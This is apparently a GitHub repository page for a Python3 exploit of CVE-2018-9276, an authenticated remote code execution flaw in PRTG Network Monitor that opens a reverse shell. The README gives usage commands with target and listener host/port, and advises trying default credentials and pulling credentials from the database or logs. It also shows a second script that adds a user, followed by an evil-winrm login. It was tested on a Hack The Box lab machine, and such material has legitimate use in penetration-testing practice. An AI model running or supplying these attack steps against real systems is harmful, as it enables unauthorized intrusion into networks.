Skip to content

A1vinSmith/CVE-2018-9276

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)

Dependancies

  • Impacket (python3 version)
  • Netcat
  • Msfvenom

Usage

git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
  1. The credentials are needed for performing the exploit. Try default credentials prtgadmin:prtgadmin. And It might be worth checking the database or log to gain them. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
  2. Try --lport 445 if the port has not been occupied
  3. There are few twisted comments in the code. They might need some modifications.
  4. It might take few attempts to succeed. Reboot a target machine is always a good option. Especially when your payload causes some impact.

Test coverage

HTB Netmon box

OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

Credit

A Big Thank you for wildkindcc's python2 version https://github.com/wildkindcc/CVE-2018-9276

Expand Knowledge

Using metasploit

https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

Manually exploit

https://www.codewatch.org/blog/?p=453

testchars

Remote Code Execution

https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

Usage sample

The credentials are needed for performing the exploit. First login and get the authenticated cookie to add a new user.

./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'

Screen Shot 2021-07-29 at 3 14 10 PM

About

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%